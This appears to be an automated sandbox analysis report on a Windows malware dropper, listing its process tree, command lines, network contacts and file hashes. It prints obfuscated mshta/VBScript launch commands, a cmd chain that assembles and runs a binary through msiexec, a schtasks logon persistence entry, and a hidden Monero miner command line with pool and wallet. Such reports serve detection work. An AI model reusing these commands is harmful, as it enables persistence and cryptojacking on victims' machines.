PID 2740 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 2740 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2740 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 2740 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 2740 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 2740 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2740 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 2740 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 2740 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 2740 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2904 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2904 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2904 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2904 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2740 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 2740 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 2740 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 2740 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2740 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe

"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"

C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe

"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"

C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe

"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"

C:\Users\Admin\AppData\Local\Temp\inst2.exe

"C:\Users\Admin\AppData\Local\Temp\inst2.exe"

C:\Users\Admin\AppData\Local\Temp\4.exe

"C:\Users\Admin\AppData\Local\Temp\4.exe"

C:\Users\Admin\AppData\Local\Temp\cxl-game.exe

"C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp" /SL5="$7021A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe

"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )

C:\Users\Admin\AppData\Local\Temp\8.exe

"C:\Users\Admin\AppData\Local\Temp\8.exe"

C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp" /SL5="$A0192,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe

..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -iM "search_hyperfs_206.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )

C:\Users\Admin\AppData\Local\Temp\Jonba.exe

"C:\Users\Admin\AppData\Local\Temp\Jonba.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" EcHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 1464

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y ..\lXQ2g.WC

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Users\Admin\AppData\Local\Temp\f78be40.exe

"C:\Users\Admin\AppData\Local\Temp\f78be40.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 536

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 fobe1.com udp
US 8.8.8.8:53 www.independent.co.uk udp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 8.8.8.8:53 rss.nytimes.com udp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 8.8.8.8:53 mas.to udp
US 151.101.193.164:443 rss.nytimes.com tcp
US 172.67.166.96:443 mas.to tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 c.pki.goog udp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 my-all-group.bar udp
US 151.101.193.164:443 rss.nytimes.com tcp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 151.101.193.164:443 rss.nytimes.com tcp
US 104.26.3.46:443 iplogger.org tcp
GB 142.250.187.238:80 www.google-analytics.com tcp
US 8.8.8.8:53 s3.tebi.io udp
US 104.26.3.46:443 iplogger.org tcp
DE 159.69.141.93:443 s3.tebi.io tcp
DE 159.69.141.93:443 s3.tebi.io tcp
US 104.26.3.46:443 iplogger.org tcp
DE 159.69.141.93:443 s3.tebi.io tcp
DE 159.69.141.93:443 s3.tebi.io tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 72.84.118.132:8080 tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
GB 51.195.138.197:14433 xmr-eu2.nanopool.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.58.224:14433 xmr-eu1.nanopool.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 72.84.118.132:8080 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp

Files

memory/2740-0-0x0000000074A8E000-0x0000000074A8F000-memory.dmp

memory/2740-1-0x0000000000E70000-0x000000000157C000-memory.dmp

\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe

MD5 a97c8c767343939c63ab2c3a7f9186fd
SHA1 5a8582d13af999922c1ad75db58950ad9523f8dc
SHA256 c528db4c190ac29c57c7810b26e9bf5c6e78b2ebbdbe64d81cfe57289a537768
SHA512 268bb93a76760e4f8a3d3229cdc5dec5930de46d1fdd85950015f68dab403f615d3e5854d04c72397c990cfd5525f233920c540adad50ef1e2696426ec37b599

\Users\Admin\AppData\Local\Temp\inst2.exe

MD5 d57afeb2944b37345cda2e47db2ca5e3
SHA1 d3c8c74ae71450a59f005501d537bdb2bdd456ee
SHA256 06fa55c63ca655c7d67ac59fc8276d086bc39dbe727ef7de80fc42dcd575711e
SHA512 d9ece7d17c4e275f85a4bc58128ef67abc33b19cc77425e5fd2f896a03975469432fa9ec8f05eeefe3ac5062c1fb842702cc80a4eb97b1737597b6dc3dde94e8

C:\Users\Admin\AppData\Local\Temp\4.exe

MD5 1581dee9ad745f69413381da2c06f68b
SHA1 79926e1bbcb97f41e63efcba2ab696259fdb98ce
SHA256 f8cb7c4bf0b265fcbed502ab4abb3dfa6c0488c0d53c68742582df26bbd6bf0e
SHA512 9ea8f526304bf123e4f50cb94468d01287576edafcbc25046c9d5094d8990dee38a9309d00462239a8c73f6b3d288354dd6fcfab29ab4fe60db6acde500283ff

C:\Users\Admin\AppData\Local\Temp\cxl-game.exe

MD5 199ac38e98448f915974878daeac59d5
SHA1 ec36afe8b99d254b6983009930f70d51232be57e
SHA256 b3f30bbad084a12ea28f3c21157083b1e0d30ca57e0da4e678d8567b5eb79dcf
SHA512 61af8746f073870dd632adb7cca4cec0f4772ea5737b25da1cce1f7104a5826019ea72ba84174b7758b73b2cd3fd8320c3acffd1bd5f96704d4061323413867e

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 a7703240793e447ec11f535e808d2096
SHA1 913af985f540dab68be0cdf999f6d7cb52d5be96
SHA256 6a17ebf5da6aa3a1f4813e5f46fdd5d19d026bcfac91f232359f98e43df3c38f
SHA512 57bdcdfcfa11f6b5bf4149be0fee0444fcf67ccececf1009b166b17b7dce30da1a472f1890736186f4ef76e02ed23cc0dd2a41dc9bff94218a059832d4b5c69e

C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe

MD5 7b1ff60b0ba26d132c74535a641a0e02
SHA1 0180b514cb32ae43fcefda0863a96f1f79a51b33
SHA256 accb11ccb1692a5e771981a5659d68c8adc3e225f476ca3387b57d818381ed1b
SHA512 3dbe1669e6f0f2c498a4276ef4d31ccf872bc2fcd4f1a1c282e6caf48d6cbd12d8685a05a9f43e3eef9fff8ba143ad1b14227f6c1a4a4263e242b5f8716a1034

memory/2844-40-0x0000000000910000-0x0000000000918000-memory.dmp

memory/2704-39-0x0000000000930000-0x000000000094A000-memory.dmp

memory/2552-44-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2704-49-0x0000000000240000-0x0000000000246000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

\Users\Admin\AppData\Local\Temp\is-OOOHO.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe

MD5 dd3f5335f760b949760b02aac1187694
SHA1 f53535bb3093caef66890688e6c214bcb4c51ef9
SHA256 90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26
